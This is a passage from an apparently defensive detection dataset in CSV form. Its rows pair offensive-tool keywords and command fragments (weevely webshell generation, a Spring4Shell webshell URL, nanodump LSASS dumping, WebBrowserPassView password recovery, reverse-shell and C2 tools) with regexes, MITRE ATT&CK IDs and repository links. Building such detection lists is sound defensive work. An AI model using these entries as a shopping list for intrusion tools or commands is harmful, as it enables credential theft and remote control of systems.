- T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*We recommend to XOR your shellcode before you transfer it*",".{0,1000}We\srecommend\sto\sXOR\syour\sshellcode\sbefore\syou\stransfer\sit.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*we.exe -s rssocks -d *",".{0,1000}we\.exe\s\-s\srssocks\s\-d\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 
- T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*weak1337/Alcatraz*",".{0,1000}weak1337\/Alcatraz.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*weakpass.com/crack-js*",".{0,1000}weakpass\.com\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass.com/generate*",".{0,1000}weakpass\.com\/generate.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass.com/wordlist/*",".{0,1000}weakpass\.com\/wordlist\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of 
tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass/crack-js*",".{0,1000}weakpass\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass_3.7z*",".{0,1000}weakpass_3\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass_3a.7z.torrent*",".{0,1000}weakpass_3a\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass-main.*",".{0,1000}weakpass\-main\..{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery*",".{0,1000}Weaponized\sJuciyPotato\sby\s\@decoder_it\sand\s\@Guitro\salong\swith\sBITS\sWinRM\sdiscovery.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*web_cloner/interceptor*",".{0,1000}web_cloner\/interceptor.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*webapi/nemesis_api.py*",".{0,1000}webapi\/nemesis_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*WebBrowserPassView.cfg*",".{0,1000}WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 
- T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*WebBrowserPassView.pdb*",".{0,1000}WebBrowserPassView\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.zip*",".{0,1000}WebBrowserPassView\.zip.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a 
password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*webcam-capture-0.3.10.jar*",".{0,1000}webcam\-capture\-0\.3\.10\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*webcamsnap -v*",".{0,1000}webcamsnap\s\-v.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*webclientservicescanner -dc-ip *",".{0,1000}webclientservicescanner\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WebDavC2*",".{0,1000}WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*webdavC2.py*",".{0,1000}webdavC2\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*WebDavC2-master.zip*",".{0,1000}WebDavC2\-master\.zip.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*webdavC2server.py*",".{0,1000}webdavC2server\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*WebDeveloperSecurityChecklist*",".{0,1000}WebDeveloperSecurityChecklist.{0,1000}","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","5","408","60","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z" "*web-hacking-toolkit.git*",".{0,1000}web\-hacking\-toolkit\.git.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*webinject64.dll*",".{0,1000}webinject64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*webshell http*/tomcatwar.jsp?cmd=*",".{0,1000}webshell\shttp.{0,1000}\/tomcatwar\.jsp\?cmd\=.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","1","20","11","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" 
"*webshell_execute*",".{0,1000}webshell_execute.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*webshell-exegol.php*",".{0,1000}webshell\-exegol\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WebSocketReverseShellDotNet*",".{0,1000}WebSocketReverseShellDotNet.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*weevely generate *.php*",".{0,1000}weevely\sgenerate\s.{0,1000}\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*weevely https://*.php * id*",".{0,1000}weevely\shttps\:\/\/.{0,1000}\.php\s.{0,1000}\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 
- T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Welcome to OpenBullet 2*",".{0,1000}Welcome\sto\sOpenBullet\s2.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*Welcome to the Mrvar0x PowerShell Remote Shell!*",".{0,1000}Welcome\sto\sthe\sMrvar0x\sPowerShell\sRemote\sShell!.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*wePWNise*",".{0,1000}wePWNise.{0,1000}","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. 
Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","350","96","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z" "*werdhaihai/AtlasReaper*",".{0,1000}werdhaihai\/AtlasReaper.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*werfault_shtinkering*",".{0,1000}werfault_shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*werfault_silent_process_exit*",".{0,1000}werfault_silent_process_exit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*WerTrigger.exe*",".{0,1000}WerTrigger\.exe.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*WerTrigger-master*",".{0,1000}WerTrigger\-master.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*",".{0,1000}wevtutil\sqe\ssecurity\s\/format\:text\s\/q\:.{0,1000}Event\[System\[\(EventID\=4624\)\].{0,1000}find\s.{0,1000}Source\sNetwork\sAddress.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - 
winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wfencode -*",".{0,1000}wfencode\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode -e *",".{0,1000}wfencode\s\-e\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode.bat*",".{0,1000}wfencode\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode.py*",".{0,1000}wfencode\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload -*",".{0,1000}wfpayload\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload.bat*",".{0,1000}wfpayload\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web 
application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload.py*",".{0,1000}wfpayload\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*WfpEscalation.exe*",".{0,1000}WfpEscalation\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*WfpTokenDup.exe -*",".{0,1000}WfpTokenDup\.exe\s\-.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*wfuzz --*.txt*",".{0,1000}wfuzz\s\-\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*wfuzz*",".{0,1000}wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.bat*",".{0,1000}wfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.get_payload*",".{0,1000}wfuzz\.get_payload.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.py*",".{0,1000}wfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz.wfuzz*",".{0,1000}wfuzz\.wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzz/wordlist*",".{0,1000}wfuzz\/wordlist.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wfuzz-cli.py*",".{0,1000}wfuzz\-cli\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 
- TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfuzzp.py*",".{0,1000}wfuzzp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wgen.py*",".{0,1000}wgen\.py.{0,1000}","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","2","106","34","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z" "*wget *http-vuln-cve2020-5902.nse*",".{0,1000}wget\s.{0,1000}http\-vuln\-cve2020\-5902\.nse.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP 